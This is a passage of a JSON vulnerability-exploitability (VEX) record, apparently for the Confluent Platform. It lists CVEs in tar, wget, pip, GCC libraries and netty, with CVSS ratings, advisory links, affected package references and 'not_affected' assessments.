      "affects": [
        {
          "ref": "pkg:maven/io.netty/netty-codec-haproxy@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:786f064b-a940-4937-9022-4b9b3ea2938e/1#pkg:maven/io.netty/netty-codec-haproxy@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:maven/io.netty/netty-codec-haproxy@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:maven/io.netty/netty-codec-haproxy@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:maven/io.netty/netty-codec-haproxy@4.1.135.Final"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2005-2541",
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 10,
          "severity": "high",
          "method": "CVSSv2",
          "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H"
        }
      ],
      "description": "Tar 1.15.1 does not properly warn the user when extracting setuid or setgid files, which may allow local users or remote attackers to gain privileges.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2005-2541"
        },
        {
          "url": "http://marc.info/?l=bugtraq&m=112327628230258&w=2"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2005-2541"
        },
        {
          "url": "https://lists.apache.org/thread.html/rc713534b10f9daeee2e0990239fa407e2118e4aa9e88a7041177497c@%3Cissues.guacamole.apache.org%3E"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2005-2541"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2005-2541"
        }
      ],
      "published": "2005-08-10T04:00:00+00:00",
      "updated": "2026-04-16T00:27:16+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2",
          "versions": [
            {
              "version": "2:1.34-11.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2021-31879",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.1,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.8,
          "severity": "medium",
          "method": "CVSSv2",
          "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.1,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        601
      ],
      "description": "GNU Wget through 1.21.1 does not omit the Authorization header upon a redirect to a different origin, a related issue to CVE-2018-1000007.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2021-31879"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2021-31879"
        },
        {
          "url": "https://mail.gnu.org/archive/html/bug-wget/2021-02/msg00002.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-31879"
        },
        {
          "url": "https://savannah.gnu.org/bugs/?56909"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20210618-0002/"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2021-31879"
        }
      ],
      "published": "2021-04-29T05:15:08+00:00",
      "updated": "2026-06-17T03:52:23+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "1.21.1-8.el9_4",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2021-3572",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ghsa"
          },
          "score": 5.7,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 3.5,
          "severity": "info",
          "method": "CVSSv2",
          "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.5,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        20
      ],
      "description": "A flaw was found in python-pip in the way it handled Unicode separators in git references. A remote attacker could possibly use this issue to install a different revision on a repository. The highest threat from this vulnerability is to data integrity. This is fixed in python-pip version 21.1.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2021-3572"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2021:3254"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2021-3572"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1772014"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1928707"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1928904"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1935913"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1941534"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1955615"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1957458"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1962856"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1968074"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18874"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27619"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28493"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20095"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23336"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28957"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29921"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33503"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3426"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3572"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42771"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2021:4162"
        },
        {
          "url": "https://github.com/advisories/GHSA-5xp3-jfq3-5q8x"
        },
        {
          "url": "https://github.com/pypa/advisory-database/tree/main/vulns/pip/PYSEC-2021-437.yaml"
        },
        {
          "url": "https://github.com/pypa/pip"
        },
        {
          "url": "https://github.com/pypa/pip/commit/e46bdda9711392fec0c45c1175bae6db847cb30b"
        },
        {
          "url": "https://github.com/pypa/pip/issues/10042"
        },
        {
          "url": "https://github.com/pypa/pip/issues/10042#issuecomment-857452480"
        },
        {
          "url": "https://github.com/pypa/pip/pull/9827"
        },
        {
          "url": "https://github.com/skazi0/CVE-2021-3572/blob/master/CVE-2021-3572-v9.0.1.patch"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2021-3572.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2023-12349.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-3572"
        },
        {
          "url": "https://packetstormsecurity.com/files/162712/USN-4961-1.txt"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20240621-0006"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20240621-0006/"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-4961-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2021-3572"
        },
        {
          "url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
        },
        {
          "url": "https://www.oracle.com/security-alerts/cpujul2022.html"
        }
      ],
      "published": "2021-11-10T18:15:09+00:00",
      "updated": "2026-06-17T04:05:21+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8",
          "versions": [
            {
              "version": "21.3.1-2.el9_8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2021-46195",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 4.3,
          "severity": "medium",
          "method": "CVSSv2",
          "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.3,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        674
      ],
      "description": "GCC v12.0 was discovered to contain an uncontrolled recursion via the component libiberty/rust-demangle.c. This vulnerability allows attackers to cause a Denial of Service (DoS) by consuming excessive CPU and memory resources.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2021-46195"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2022:8415"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2021-46195"
        },
        {
          "url": "https://bugzilla.redhat.com/2046300"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2022-8415.html"
        },
        {
          "url": "https://gcc.gnu.org/bugzilla/show_bug.cgi?id=103841"
        },
        {
          "url": "https://gcc.gnu.org/git/?p=gcc.git;a=commit;h=f10bec5ffa487ad3033ed5f38cfd0fc7d696deab"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2021-46195.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2022-8415.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-46195"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2021-46195"
        }
      ],
      "published": "2022-01-14T20:15:15+00:00",
      "updated": "2026-06-17T04:14:38+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libgcc@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "11.5.0-14.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libgomp@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "11.5.0-14.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libstdc%2B%2B@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "11.5.0-14.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/libgcc@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/libgomp@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/libgcc@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/libgomp@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/libgcc@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/libgcc@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/libgomp@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/libgcc@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/libgomp@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/libgcc@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/libgomp@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/libgcc@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/libgomp@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/libgcc@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/libgomp@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/libgcc@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/libgomp@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/libgcc@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/libgomp@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/libgcc@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/libgomp@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/libgcc@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/libgomp@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/libgcc@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/libgomp@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/libgcc@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/libgomp@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
